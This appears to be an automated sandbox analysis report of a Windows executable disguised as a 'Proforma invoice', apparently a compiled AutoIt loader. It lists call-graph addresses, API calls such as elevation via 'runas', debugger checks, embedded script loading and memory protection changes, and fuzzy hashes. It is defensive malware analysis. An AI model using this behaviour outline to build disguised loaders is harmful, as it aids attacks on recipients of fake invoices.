257bcc 59 API calls 103274->103275 103276 2549fb 103275->103276 103277 257d2c 59 API calls 103276->103277 103286 254a28 103276->103286 103278 254a1c 103277->103278 103279 257726 59 API calls 103278->103279 103279->103286 103280 254a93 GetCurrentProcess IsWow64Process 103281 254aac 103280->103281 103283 254ac2 103281->103283 103284 254b2b GetSystemInfo 103281->103284 103282 28d864 103296 254b37 103283->103296 103285 254af8 103284->103285 103285->103264 103286->103280 103286->103282 103289 254ad4 103292 254b37 2 API calls 103289->103292 103290 254b1f GetSystemInfo 103291 254ae9 103290->103291 103291->103285 103293 254aef FreeLibrary 103291->103293 103294 254adc GetNativeSystemInfo 103292->103294 103293->103285 103294->103291 103297 254ad0 103296->103297 103298 254b40 LoadLibraryA 103296->103298 103297->103289 103297->103290 103298->103297 103299 254b51 GetProcAddress 103298->103299 103299->103297 103300 251066 103305 25f76f 103300->103305 103302 25106c 103303 272d40 __cinit 67 API calls 103302->103303 103304 251076 103303->103304 103306 25f790 103305->103306 103338 26ff03 103306->103338 103310 25f7d7 103311 257667 59 API calls 103310->103311 103312 25f7e1 103311->103312 103313 257667 59 API calls 103312->103313 103314 25f7eb 103313->103314 103315 257667 59 API calls 103314->103315 103316 25f7f5 103315->103316 103317 257667 59 API calls 103316->103317 103318 25f833 103317->103318 103319 257667 59 API calls 103318->103319 103320 25f8fe 103319->103320 103348 265f87 103320->103348 103324 25f930 103325 257667 59 API calls 103324->103325 103326 25f93a 103325->103326 103376 26fd9e 103326->103376 103328 25f981 103329 25f991 GetStdHandle 103328->103329 103330 2945ab 103329->103330 103331 25f9dd 103329->103331 103330->103331 103333 2945b4 103330->103333 103332 25f9e5 OleInitialize 103331->103332 103332->103302 103383 2b6b38 64 API calls Mailbox 103333->103383 103335 2945bb 103384 2b7207 CreateThread 103335->103384 103337 2945c7 CloseHandle 103337->103332 103385 26ffdc 103338->103385 103341 26ffdc 59 API calls 103342 26ff45 103341->103342 103343 257667 59 API calls 103342->103343 103344 26ff51 103343->103344 103345 257bcc 59 API calls 103344->103345 103346 25f796 103345->103346 103347 270162 6 API calls 103346->103347 103347->103310 103349 257667 59 API calls 103348->103349 103350 265f97 103349->103350 103351 257667 59 API calls 103350->103351 103352 265f9f 103351->103352 103392 265a9d 103352->103392 103355 265a9d 59 API calls 103356 265faf 103355->103356 103357 257667 59 API calls 103356->103357 103358 265fba 103357->103358 103359 270db6 Mailbox 59 API calls 103358->103359 103360 25f908 103359->103360 103361 2660f9 103360->103361 103362 266107 103361->103362 103363 257667 59 API calls 103362->103363 103364 266112 103363->103364 103365 257667 59 API calls 103364->103365 103366 26611d 103365->103366 103367 257667 59 API calls 103366->103367 103368 266128 103367->103368 103369 257667 59 API calls 103368->103369 103370 266133 103369->103370 103371 265a9d 59 API calls 103370->103371 103372 26613e 103371->103372 103373 270db6 Mailbox 59 API calls 103372->103373 103374 266145 RegisterWindowMessageW 103373->103374 103374->103324 103377 2a576f 103376->103377 103378 26fdae 103376->103378 103395 2b9ae7 60 API calls 103377->103395 103380 270db6 Mailbox 59 API calls 103378->103380 103382 26fdb6 103380->103382 103381 2a577a 103382->103328 103383->103335 103384->103337 103396 2b71ed 65 API calls 103384->103396 103386 257667 59 API calls 103385->103386 103387 26ffe7 103386->103387 103388 257667 59 API calls 103387->103388 103389 26ffef 103388->103389 103390 257667 59 API calls 103389->103390 103391 26ff3b 103390->103391 103391->103341 103393 257667 59 API calls 103392->103393 103394 265aa5 103393->103394 103394->103355 103395->103381 103397 28fdfc 103435 25ab30 Mailbox _memmove 103397->103435 103402 25b525 103464 2b9e4a 89 API calls 4 library calls 103402->103464 103404 290055 103463 2b9e4a 89 API calls 4 library calls 103404->103463 103405 270db6 59 API calls Mailbox 103423 259f37 Mailbox 103405->103423 103408 25b475 103412 258047 59 API calls 103408->103412 103410 258047 59 API calls 103410->103423 103411 290064 103418 25a057 103412->103418 103414 25b47a 103414->103404 103425 2909e5 103414->103425 103417 257667 59 API calls 103417->103423 103419 272d40 67 API calls __cinit 103419->103423 103420 2a6e8f 59 API calls 103420->103423 103421 257de1 59 API calls 103421->103435 103422 2909d6 103469 2b9e4a 89 API calls 4 library calls 103422->103469 103423->103404 103423->103405 103423->103408 103423->103410 103423->103414 103423->103417 103423->103418 103423->103419 103423->103420 103423->103422 103426 25a55a 103423->103426 103452 25c8c0 331 API calls 2 library calls 103423->103452 103453 25b900 60 API calls Mailbox 103423->103453 103470 2b9e4a 89 API calls 4 library calls 103425->103470 103468 2b9e4a 89 API calls 4 library calls 103426->103468 103429 25b2b6 103457 25f6a3 331 API calls 103429->103457 103431 259ea0 331 API calls 103431->103435 103432 29086a 103466 259c90 59 API calls Mailbox 103432->103466 103434 290878 103467 2b9e4a 89 API calls 4 library calls 103434->103467 103435->103402 103435->103418 103435->103421 103435->103423 103435->103429 103435->103431 103435->103432 103435->103434 103437 29085c 103435->103437 103438 25b21c 103435->103438 103440 270db6 59 API calls Mailbox 103435->103440 103443 2a6e8f 59 API calls 103435->103443 103446 2cdf23 103435->103446 103449 2cdf37 103435->103449 103454 259c90 59 API calls Mailbox 103435->103454 103458 2cc193 85 API calls 2 library calls 103435->103458 103459 2cc2e0 96 API calls Mailbox 103435->103459 103460 2b7956 59 API calls Mailbox 103435->103460 103461 2cbc6b 331 API calls Mailbox 103435->103461 103462 2a617e 59 API calls Mailbox 103435->103462 103437->103418 103465 2a617e 59 API calls Mailbox 103437->103465 103455 259d3c 60 API calls Mailbox 103438->103455 103440->103435 103441 25b22d 103456 259d3c 60 API calls Mailbox 103441->103456 103443->103435 103471 2ccadd 103446->103471 103448 2cdf33 103448->103435 103450 2ccadd 130 API calls 103449->103450 103451 2cdf47 103450->103451 103451->103435 103452->103423 103453->103423 103454->103435 103455->103441 103456->103429 103457->103402 103458->103435 103459->103435 103460->103435 103461->103435 103462->103435 103463->103411 103464->103437 103465->103418 103466->103437 103467->103437 103468->103418 103469->103425 103470->103418 103472 259837 84 API calls 103471->103472 103473 2ccb1a 103472->103473 103492 2ccb61 Mailbox 103473->103492 103509 2cd7a5 103473->103509 103475 2ccdb9 103476 2ccf2e 103475->103476 103481 2ccdc7 103475->103481 103548 2cd8c8 92 API calls Mailbox 103476->103548 103479 2ccf3d 103479->103481 103482 2ccf49 103479->103482 103480 259837 84 API calls 103499 2ccbb2 Mailbox 103480->103499 103522 2cc96e 103481->103522 103482->103492 103487 2cce00 103537 270c08 103487->103537 103490 2cce1a 103543 2b9e4a 89 API calls 4 library calls 103490->103543 103491 2cce33 103494 2592ce 59 API calls 103491->103494 103492->103448 103496 2cce3f 103494->103496 103495 2cce25 GetCurrentProcess TerminateProcess 103495->103491 103497 259050 59 API calls 103496->103497 103498 2cce55 103497->103498 103508 2cce7c 103498->103508 103544 258d40 59 API calls Mailbox 103498->103544 103499->103475 103499->103480 103499->103492 103541 2cfbce 59 API calls 2 library calls 103499->103541 103542 2ccfdf 61 API calls 2 library calls 103499->103542 103500 2ccfa4 103500->103492 103505 2ccfb8 FreeLibrary 103500->103505 103502 2cce6b 103545 2cd649 107 API calls _free 103502->103545 103505->103492 103508->103500 103546 258d40 59 API calls Mailbox 103508->103546 103547 259d3c 60 API calls Mailbox 103508->103547 103549 2cd649 107 API calls _free 103508->103549 103510 257e4f 59 API calls 103509->103510 103511 2cd7c0 CharLowerBuffW 103510->103511 103550 2af167 103511->103550 103515 257667 59 API calls 103516 2cd7f9 103515->103516 103518 25784b 59 API calls 103516->103518 103517 2cd858 Mailbox 103517->103499 103519 2cd810 103518->103519 103520 257d2c 59 API calls 103519->103520 103521 2cd81c Mailbox 103520->103521 103521->103517 103557 2ccfdf 61 API calls 2 library calls 103521->103557 103523 2cc989 103522->103523 103524 2cc9de 103522->103524 103525 270db6 Mailbox 59 API calls 103523->103525 103528 2cda50 103524->103528 103527 2cc9ab 103525->103527 103526 270db6 Mailbox 59 API calls 103526->103527 103527->103524 103527->103526 103529 2cdc79 Mailbox 103528->103529 103530 2cda73 _strcat _wcscpy __NMSG_WRITE 103528->103530 103529->103487 103530->103529 103531 259be6 59 API calls 103530->103531 103532 259b3c 59 API calls 103530->103532 103533 259b98 59 API calls 103530->103533 103534 259837 84 API calls 103530->103534 103535 27571c 58 API calls __crtLCMapStringA_stat 103530->103535 103560 2b5887 61 API calls 2 library calls 103530->103560 103531->103530 103532->103530 103533->103530 103534->103530 103535->103530 103539 270c1d 103537->103539 103538 270cb5 VirtualProtect 103540 270c83 103538->103540 103539->103538 103539->103540 103540->103490 103540->103491 103541->103499 103542->103499 103543->103495 103544->103502 103545->103508 103546->103508 103547->103508 103548->103479 103549->103508 103551 2af192 __NMSG_WRITE 103550->103551 103552 2af1d1 103551->103552 103555 2af1c7 103551->103555 103556 2af278 103551->103556 103552->103515 103552->103521 103555->103552 103558 2578c4 61 API calls 103555->103558 103556->103552 103559 2578c4 61 API calls 103556->103559 103557->103517 103558->103555 103559->103556 103560->103530 103561 253633 103562 25366a 103561->103562 103563 2536e7 103562->103563 103564 253688 103562->103564 103598 2536e5 103562->103598 103566 28d0cc 103563->103566 103567 2536ed 103563->103567 103568 253695 103564->103568 103569 25374b PostQuitMessage 103564->103569 103565 2536ca DefWindowProcW 103603 2536d8 103565->103603 103610 261070 10 API calls Mailbox 103566->103610 103572 253715 SetTimer RegisterWindowMessageW 103567->103572 103573 2536f2 103567->103573 103570 2536a0 103568->103570 103571 28d154 103568->103571 103569->103603 103576 253755 103570->103576 103577 2536a8 103570->103577 103615 2b2527 71 API calls _memset 103571->103615 103578 25373e CreatePopupMenu 103572->103578 103572->103603 103580 28d06f 103573->103580 103581 2536f9 KillTimer 103573->103581 103575 28d0f3 103611 261093 331 API calls Mailbox 103575->103611 103608 2544a0 64 API calls _memset 103576->103608 103583 28d139 103577->103583 103584 2536b3 103577->103584 103578->103603 103587 28d0a8 MoveWindow 103580->103587 103588 28d074 103580->103588 103606 25443a Shell_NotifyIconW _memset 103581->103606 103583->103565 103614 2a7c36 59 API calls Mailbox 103583->103614 103590 28d124 103584->103590 103599 2536be 103584->103599 103585 28d166 103585->103565 103585->103603 103587->103603 103591 28d078 103588->103591 103592 28d097 SetFocus 103588->103592 103613 2b2d36 81 API calls _memset 103590->103613 103594 28d081 103591->103594 103591->103599 103592->103603 103593 25370c 103607 253114 DeleteObject DestroyWindow Mailbox 103593->103607 103609 261070 10 API calls Mailbox 103594->103609 103598->103565 103599->103565 103612 25443a Shell_NotifyIconW _memset 103599->103612 103601 253764 103601->103603 103604 28d118 103605 25434a 68 API calls 103604->103605 103605->103598 103606->103593 103607->103603 103608->103601 103609->103603 103610->103575 103611->103599 103612->103604 103613->103601 103614->103598 103615->103585 103616 2b8d0d 103617 2b8d1a 103616->103617 103618 2b8d20 103616->103618 103620 272d55 _free 58 API calls 103617->103620 103619 2b8d31 103618->103619 103621 272d55 _free 58 API calls 103618->103621 103622 2b8d43 103619->103622 103623 272d55 _free 58 API calls 103619->103623 103620->103618 103621->103619 103623->103622 103624 29416f 103628 2a5fe6 103624->103628 103626 29417a 103627 2a5fe6 85 API calls 103626->103627 103627->103626 103629 2a6020 103628->103629 103635 2a5ff3 103628->103635 103629->103626 103630 2a6022 103640 259328 84 API calls Mailbox 103630->103640 103632 2a6027 103633 259837 84 API calls 103632->103633 103634 2a602e 103633->103634 103636 257b2e 59 API calls 103634->103636 103635->103629 103635->103630 103635->103632 103637 2a601a 103635->103637 103636->103629 103639 2595a0 59 API calls _wcsstr 103637->103639 103639->103629 103640->103632 103641 25107d 103646 25708b 103641->103646 103643 25108c 103644 272d40 __cinit 67 API calls 103643->103644 103645 251096 103644->103645 103647 25709b __write_nolock 103646->103647 103648 257667 59 API calls 103647->103648 103649 257151 103648->103649 103650 254706 61 API calls 103649->103650 103651 25715a 103650->103651 103677 27050b 103651->103677 103654 257cab 59 API calls 103655 257173 103654->103655 103656 253f74 59 API calls 103655->103656 103657 257182 103656->103657 103658 257667 59 API calls 103657->103658 103659 25718b 103658->103659 103660 257d8c 59 API calls 103659->103660 103661 257194 RegOpenKeyExW 103660->103661 103662 28e8b1 RegQueryValueExW 103661->103662 103666 2571b6 Mailbox 103661->103666 103663 28e8ce 103662->103663 103664 28e943 RegCloseKey 103662->103664 103665 270db6 Mailbox 59 API calls 103663->103665 103664->103666 103669 28e955 _wcscat Mailbox __NMSG_WRITE 103664->103669 103667 28e8e7 103665->103667 103666->103643 103668 25522e 59 API calls 103667->103668 103670 28e8f2 RegQueryValueExW 103668->103670 103669->103666 103674 257de1 59 API calls 103669->103674 103675 253f74 59 API calls 103669->103675 103676 2579f2 59 API calls 103669->103676 103671 28e90f 103670->103671 103672 28e929 103670->103672 103673 257bcc 59 API calls 103671->103673 103672->103664 103673->103672 103674->103669 103675->103669 103676->103669 103678 281940 __write_nolock 103677->103678 103679 270518 GetFullPathNameW 103678->103679 103680 27053a 103679->103680 103681 257bcc 59 API calls 103680->103681 103682 257165 103681->103682 103682->103654 103683 c52278 103697 c4fec8 103683->103697 103685 c52332 103700 c52168 103685->103700 103703 c53358 GetPEB 103697->103703 103699 c50553 103699->103685 103701 c52171 Sleep 103700->103701 103702 c5217f 103701->103702 103704 c53382 103703->103704 103704->103699

                                                                                                                    Executed Functions

                                                                                                                    Function 00253B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00253B68
                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00253B7A
                                                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,003152F8,003152E0,?,?), ref: 00253BEB
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                      • Part of subcall function 0026092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00253C14,003152F8,?,?,?), ref: 0026096E
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00253C6F
                                                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00307770,00000010), ref: 0028D281
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,003152F8,?,?,?), ref: 0028D2B9
                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00304260,003152F8,?,?,?), ref: 0028D33F
                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 0028D346
                                                                                                                      • Part of subcall function 00253A46: GetSysColorBrush.USER32(0000000F), ref: 00253A50
                                                                                                                      • Part of subcall function 00253A46: LoadCursorW.USER32(00000000,00007F00), ref: 00253A5F
                                                                                                                      • Part of subcall function 00253A46: LoadIconW.USER32(00000063), ref: 00253A76
                                                                                                                      • Part of subcall function 00253A46: LoadIconW.USER32(000000A4), ref: 00253A88
                                                                                                                      • Part of subcall function 00253A46: LoadIconW.USER32(000000A2), ref: 00253A9A
                                                                                                                      • Part of subcall function 00253A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00253AC0
                                                                                                                      • Part of subcall function 00253A46: RegisterClassExW.USER32(?), ref: 00253B16
                                                                                                                      • Part of subcall function 002539D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00253A03
                                                                                                                      • Part of subcall function 002539D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00253A24
                                                                                                                      • Part of subcall function 002539D5: ShowWindow.USER32(00000000,?,?), ref: 00253A38
                                                                                                                      • Part of subcall function 002539D5: ShowWindow.USER32(00000000,?,?), ref: 00253A41
                                                                                                                      • Part of subcall function 0025434A: _memset.LIBCMT ref: 00254370
                                                                                                                      • Part of subcall function 0025434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00254415
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas$%.
                                                                                                                    • API String ID: 529118366-1956105530
                                                                                                                    • Opcode ID: 9332150073f948f6401d29008412647c63eb2241bddef46cd16a171960ba1597
                                                                                                                    • Instruction ID: 06258cd2555686946cd88dffaf2dba8b7f9e1a7e3c759af6b34b98c4a6328ae8
                                                                                                                    • Opcode Fuzzy Hash: 9332150073f948f6401d29008412647c63eb2241bddef46cd16a171960ba1597
                                                                                                                    • Instruction Fuzzy Hash: 6F512A31D65149EECF02EBB4EC059FD7778AF8D742F008466FC51A21A1CA70566ACF29
                                                                                                                    Function 002549A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1037 2549a0-254a00 call 257667 GetVersionExW call 257bcc 1042 254a06 1037->1042 1043 254b0b-254b0d 1037->1043 1045 254a09-254a0e 1042->1045 1044 28d767-28d773 1043->1044 1046 28d774-28d778 1044->1046 1047 254a14 1045->1047 1048 254b12-254b13 1045->1048 1050 28d77a 1046->1050 1051 28d77b-28d787 1046->1051 1049 254a15-254a4c call 257d2c call 257726 1047->1049 1048->1049 1059 254a52-254a53 1049->1059 1060 28d864-28d867 1049->1060 1050->1051 1051->1046 1053 28d789-28d78e 1051->1053 1053->1045 1055 28d794-28d79b 1053->1055 1055->1044 1057 28d79d 1055->1057 1061 28d7a2-28d7a5 1057->1061 1059->1061 1062 254a59-254a64 1059->1062 1063 28d869 1060->1063 1064 28d880-28d884 1060->1064 1065 28d7ab-28d7c9 1061->1065 1066 254a93-254aaa GetCurrentProcess IsWow64Process 1061->1066 1067 28d7ea-28d7f0 1062->1067 1068 254a6a-254a6c 1062->1068 1069 28d86c 1063->1069 1071 28d86f-28d878 1064->1071 1072 28d886-28d88f 1064->1072 1065->1066 1070 28d7cf-28d7d5 1065->1070 1073 254aac 1066->1073 1074 254aaf-254ac0 1066->1074 1079 28d7fa-28d800 1067->1079 1080 28d7f2-28d7f5 1067->1080 1075 254a72-254a75 1068->1075 1076 28d805-28d811 1068->1076 1069->1071 1077 28d7df-28d7e5 1070->1077 1078 28d7d7-28d7da 1070->1078 1071->1064 1072->1069 1081 28d891-28d894 1072->1081 1073->1074 1082 254ac2-254ad2 call 254b37 1074->1082 1083 254b2b-254b35 GetSystemInfo 1074->1083 1084 28d831-28d834 1075->1084 1085 254a7b-254a8a 1075->1085 1087 28d81b-28d821 1076->1087 1088 28d813-28d816 1076->1088 1077->1066 1078->1066 1079->1066 1080->1066 1081->1071 1094 254ad4-254ae1 call 254b37 1082->1094 1095 254b1f-254b29 GetSystemInfo 1082->1095 1086 254af8-254b08 1083->1086 1084->1066 1093 28d83a-28d84f 1084->1093 1090 254a90 1085->1090 1091 28d826-28d82c 1085->1091 1087->1066 1088->1066 1090->1066 1091->1066 1096 28d859-28d85f 1093->1096 1097 28d851-28d854 1093->1097 1102 254ae3-254ae7 GetNativeSystemInfo 1094->1102 1103 254b18-254b1d 1094->1103 1098 254ae9-254aed 1095->1098 1096->1066 1097->1066 1098->1086 1100 254aef-254af2 FreeLibrary 1098->1100 1100->1086 1102->1098 1103->1102
                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 002549CD
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    • GetCurrentProcess.KERNEL32(?,002DFAEC,00000000,00000000,?), ref: 00254A9A
                                                                                                                    • IsWow64Process.KERNEL32(00000000), ref: 00254AA1
                                                                                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00254AE7
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00254AF2
                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00254B23
                                                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00254B2F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1986165174-0
                                                                                                                    • Opcode ID: cd8fa14cbdfa3eda4a67fb68a1a8ad7bad4bb3c4e1a21d25cd31aa088176dcbc
                                                                                                                    • Instruction ID: d95f96ff178e2d7f402c200ca2a93ab3a3cfbc0602ca4637fbbeede16797748d
                                                                                                                    • Opcode Fuzzy Hash: cd8fa14cbdfa3eda4a67fb68a1a8ad7bad4bb3c4e1a21d25cd31aa088176dcbc
                                                                                                                    • Instruction Fuzzy Hash: 3C9115359AA7C1DEC731EB6894501AAFFF4AF29305B04496ED4CB83A81D230E95CC71D
                                                                                                                    Function 00254E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1104 254e89-254ea1 CreateStreamOnHGlobal 1105 254ec1-254ec6 1104->1105 1106 254ea3-254eba FindResourceExW 1104->1106 1107 254ec0 1106->1107 1108 28d933-28d942 LoadResource 1106->1108 1107->1105 1108->1107 1109 28d948-28d956 SizeofResource 1108->1109 1109->1107 1110 28d95c-28d967 LockResource 1109->1110 1110->1107 1111 28d96d-28d98b 1110->1111 1111->1107
                                                                                                                    APIs
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00254D8E,?,?,00000000,00000000), ref: 00254E99
                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00254D8E,?,?,00000000,00000000), ref: 00254EB0
                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00254D8E,?,?,00000000,00000000,?,?,?,?,?,?,00254E2F), ref: 0028D937
                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00254D8E,?,?,00000000,00000000,?,?,?,?,?,?,00254E2F), ref: 0028D94C
                                                                                                                    • LockResource.KERNEL32(00254D8E,?,?,00254D8E,?,?,00000000,00000000,?,?,?,?,?,?,00254E2F,00000000), ref: 0028D95F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                    • String ID: SCRIPT
                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                    • Opcode ID: 816192e4d9d301f34905e73c6df5b13263b490fb2c853e22b93ead8981930563
                                                                                                                    • Instruction ID: e73698e0b96f023eeddb248f9f755e7f677296938bb72cb04374d23abe55a382
                                                                                                                    • Opcode Fuzzy Hash: 816192e4d9d301f34905e73c6df5b13263b490fb2c853e22b93ead8981930563
                                                                                                                    • Instruction Fuzzy Hash: 3B11BC70600301ABD7229F65EC49F27BBBAEBC5B01F14422DF80686290DB71EC048A24
                                                                                                                    Function 0025FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: pb1$%.
                                                                                                                    • API String ID: 3964851224-8071122
                                                                                                                    • Opcode ID: 7fe650e23bc6c4553367e1c7e092ca6d3d7d83e9daa0994c0a2c2f9e64b96eb3
                                                                                                                    • Instruction ID: f402e41bf585b1b17b310181c686d7bc432448a0bdbae6e1b445388ce99515ec
                                                                                                                    • Opcode Fuzzy Hash: 7fe650e23bc6c4553367e1c7e092ca6d3d7d83e9daa0994c0a2c2f9e64b96eb3
                                                                                                                    • Instruction Fuzzy Hash: 659259706283418FD720DF14C480B6BB7E5BF89304F14896DE88A9B351D775ECA9DB92
                                                                                                                    Function 002B445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,0028E398), ref: 002B446A
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 002B447B
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 002B448B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 48322524-0
                                                                                                                    • Opcode ID: 9090f8d3c1a809943e93cd1309883bdf7c1269ea82cbe95ea8e1dc61a758ab0e
                                                                                                                    • Instruction ID: 6beb6790ada8d64729cf50dba9de00f2f41142c8767b223db713eda348279d54
                                                                                                                    • Opcode Fuzzy Hash: 9090f8d3c1a809943e93cd1309883bdf7c1269ea82cbe95ea8e1dc61a758ab0e
                                                                                                                    • Instruction Fuzzy Hash: 82E0D8328215016B42107B38FC4D4E9776CAE05375F200716F936C10D0E7B45D209599
                                                                                                                    Function 002609D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00260A5B
